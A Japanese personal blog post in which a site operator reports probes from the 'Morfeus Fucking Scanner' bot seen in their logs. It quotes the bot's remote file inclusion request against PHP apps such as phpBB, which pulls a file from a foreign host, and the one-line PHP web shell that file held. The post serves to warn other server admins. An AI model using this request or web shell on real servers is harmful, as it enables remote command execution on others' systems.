今日はなんだかお客さんがたくさんいらっしゃってます(ウチのサイトの基準では)。カウンタを見れば今日の分、すでに20を超えて1日分の公開以来最多を記録しております。
みなさん、何を見にウチに来られたのかなと少し気になってログをチェックしてみると、大半の方が "Morfeus Fucking Scanner" をキーワードにした検索経由でここにたどりついた様子。ああ、あれか・・・。ヨソでも暴れてるのか、けしからん。
わたしも今日 Google で同じキーワードを検索してみたら、出るのはウチのサイトだけでした。お客さん、増えるわけだ。この件でここにいらっしゃった方はおそらくサーバーの管理をやっておられる方だと思いますが、そちらの状況はいかがなものでしょう?
なお、ここに "Morfeus Fucking Scanner" のことを書いたのは今月の19日でしたが、翌20日にもう一度アクセスがあった後はこのスキャナー、来ていません。
繰り返しになりますが、このスキャナー、
GET /components/com_forum/download.php?phpbb_root_path=
http://xxx.xxx.xxx.xxx/M.txt?&/
こんな感じのリクエストをかけてきます(他のパターンもあり)。Wikiwig 、phpBB 、WebCalendar 等、PHP を使った Web アプリを狙っていると思われます。上の例の "xxx.xxx.xxx.xxx" の部分は実際は IP アドレスとなっており、そのアドレスには Web サイトが存在しています(国外)。ブラウザでアクセスしようとしたらセキュリティ・ソフトに「危険なサイト」だと警告されてしまいました。
それから "M.txt" には下記の PHP スクリプトが書かれていました
system($_GET['cmd']);
die ("Morfeus hacked you");
ウチのサイトには4つの IP アドレスからアクセスがあり、発信元はすべてアメリカでした。
今のところ、こちらでわかっていることはこのくらいです。